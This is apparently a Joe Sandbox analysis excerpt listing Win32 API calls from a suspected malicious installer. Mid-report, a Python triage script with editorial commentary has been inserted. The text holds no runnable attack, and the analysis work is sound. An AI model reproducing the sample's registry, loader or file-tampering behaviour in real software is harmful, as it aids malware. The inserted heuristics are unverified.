                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                              • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                              • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                              • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                              • RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 167947723-0
                                                                                              • Opcode ID: 58791b35822ebf987f34c85fd11d5e7110b4779ceafcebdb4e355afaf954f7bb
                                                                                              • Instruction ID: f1a23a851f53a7f1557dfd10c54e6723b1dbb9afb6220ffeee8eb14207b379e7
                                                                                              • Opcode Fuzzy Hash: 58791b35822ebf987f34c85fd11d5e7110b4779ceafcebdb4e355afaf954f7bb
                                                                                              • Instruction Fuzzy Hash: 2BF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                              • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                              • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                              • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 849931509-0
                                                                                              • Opcode ID: 2ce4d637b6428a55ca1d1321f0026fb0473b46bdb20893122d5ac17927a2b1c8
                                                                                              • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                                                              • Opcode Fuzzy Hash: 2ce4d637b6428a55ca1d1321f0026fb0473b46bdb20893122d5ac17927a2b1c8
                                                                                              • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405292
                                                                                                • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004052DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2896919175-0
                                                                                              • Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                              • Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
                                                                                              • Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                              • Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(00010464,?), ref: 0040157F
                                                                                              • ShowWindow.USER32(0001045E), ref: 00401594
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: 80c01896ddf0bfd96a5f83b3cdf674c0755e4aa1b1326ce251104d3977c9ad8a
                                                                                              • Instruction ID: 33fc8dbab593221758c929e2c4cf6aa55605c55e9f7a49d44961cb8ca10e987b
                                                                                              • Opcode Fuzzy Hash: 80c01896ddf0bfd96a5f83b3cdf674c0755e4aa1b1326ce251104d3977c9ad8a
                                                                                              • Instruction Fuzzy Hash: 88E08633B041049BCB15CFA8ED808AEB7A6EB88321314047FD502B36A0C679ED40CF28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                                • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                              • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                              • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                              • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402E2E,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C29
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                              • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                              • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                              • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
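Each "APIs" entry above records the call, the module it resolved to, the argument values the sandbox could recover ("?" where it could not), and the address of the call site. The following Python script is an added example and not part of the Joe Sandbox report: it parses lines in exactly that format and applies a few triage heuristics of the editor's own (the heuristic names and thresholds are editorial choices, and the sample lines are copied from the listings in this section). GetProcAddress beside a module load or lookup means the static import table under-reports what the code can do; LoadLibraryExW with dwFlags 0x8 (LOAD_WITH_ALTERED_SEARCH_PATH) after GetSystemDirectoryW and wsprintfW is a full-path load from the system directory; RegDelete*/RegSet* and SetFileAttributes(path, 0) call sites are where persistence and file-tampering logic usually sits.

```python
"""Parse the 'APIs' lines of Joe Sandbox disassembly blocks and flag a few
call patterns an analyst triages first. Added example, not part of the
report; the heuristics below are the editor's own."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: API lines copied verbatim from the blocks in this section.
SAMPLE = r"""
  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
• RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
• RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
• GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
• GetProcAddress.KERNEL32(00000000,?), ref: 00406457
  • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
  • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
  • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
• GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
"""

# One report line: optional "Part of subcall function X:" prefix, Api.Module,
# optional "(args)", then "ref: <call-site address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

Arg = Union[int, str, None]

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]          # None where the sandbox printed '?'
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # function the call was lifted from, if any

def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok.strip('"')    # string literal the sandbox recovered (e.g. a path)

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue         # headers, hashes and dump sources are skipped
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16),
                             int(sub, 16) if sub else None))
    return calls

LOAD_WITH_ALTERED_SEARCH_PATH = 0x00000008   # LoadLibraryEx dwFlags bit

def dynamic_api_resolution(calls: List[ApiCall]) -> bool:
    """GetProcAddress next to a module load/lookup: imports are resolved at
    run time, so the PE import table under-reports the code's capability."""
    names = {c.api for c in calls}
    loaders = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
               "GetModuleHandleA", "GetModuleHandleW"}
    return "GetProcAddress" in names and bool(names & loaders)

def loadlibrary_flags(calls: List[ApiCall]) -> List[int]:
    """dwFlags of every LoadLibraryEx* call whose third argument was resolved."""
    return [c.args[2] for c in calls
            if c.api.startswith("LoadLibraryEx") and len(c.args) > 2
            and isinstance(c.args[2], int)]

def registry_write_refs(calls: List[ApiCall]) -> List[int]:
    """Call sites that change the registry (RegDelete*/RegSet*), for persistence triage."""
    return sorted(c.ref for c in calls if re.match(r"Reg(Delete|Set)", c.api))

def attribute_reset_refs(calls: List[ApiCall]) -> List[int]:
    """SetFileAttributes(path, 0) or (path, FILE_ATTRIBUTE_NORMAL) drops the
    read-only/hidden/system bits; droppers do this before overwriting or deleting."""
    return sorted(c.ref for c in calls
                  if c.api.startswith("SetFileAttributes")
                  and len(c.args) > 1 and c.args[1] in (0, 0x80))

def string_arguments(calls: List[ApiCall]):
    """Every string literal the sandbox recovered from an argument list."""
    return [(c.api, a) for c in calls for a in c.args if isinstance(a, str)]

def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "dynamic_api_resolution": dynamic_api_resolution(calls),
        "loadlibrary_altered_search_path":
            any(f & LOAD_WITH_ALTERED_SEARCH_PATH for f in loadlibrary_flags(calls)),
        "registry_write_refs": [hex(r) for r in registry_write_refs(calls)],
        "attribute_reset_refs": [hex(r) for r in attribute_reset_refs(calls)],
        "paths": [a for _, a in string_arguments(calls)],
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The parser deliberately keeps unresolved arguments as None rather than dropping them, so positional checks such as "third argument of LoadLibraryExW" still line up with the Win32 prototype; the argument lists Joe Sandbox prints are stack reads, so treat any positional decode beyond the documented parameter count as a hint rather than a fact.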
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
• Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
• Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
• Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
• GetLastError.KERNEL32 ref: 0040570F
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
• Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
• Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
• Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
Uniqueness
Uniqueness Score: -1.00%

APIs
• MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: FileMove
• String ID:
• API String ID: 3562171763-0
• Opcode ID: c1911339f88ff2685d8bed33e3940ac637680d1b740950eefc1af9fa259cb3b8
• Instruction ID: a33ea4ce092b273b82d7568f8593bc3c23f19caa72544136df2e5d6ca1611784
• Opcode Fuzzy Hash: c1911339f88ff2685d8bed33e3940ac637680d1b740950eefc1af9fa259cb3b8
• Instruction Fuzzy Hash: 92F0B431605114D7DF10BFBA4F0DD9E32A58BC2338B28427BF911B21D5DAFC8A4196AE
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
• Instruction ID: ed87ac6fe78c97b3ff6a715646c68139f6b7da630c9be1cec1260a384e7beadd
• Opcode Fuzzy Hash: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
• Instruction Fuzzy Hash: 3AE0E676154108BFDB01DFA5EE47FE977ECAB44704F048035BA08D7091C674F5508768
Uniqueness
Uniqueness Score: -1.00%

APIs
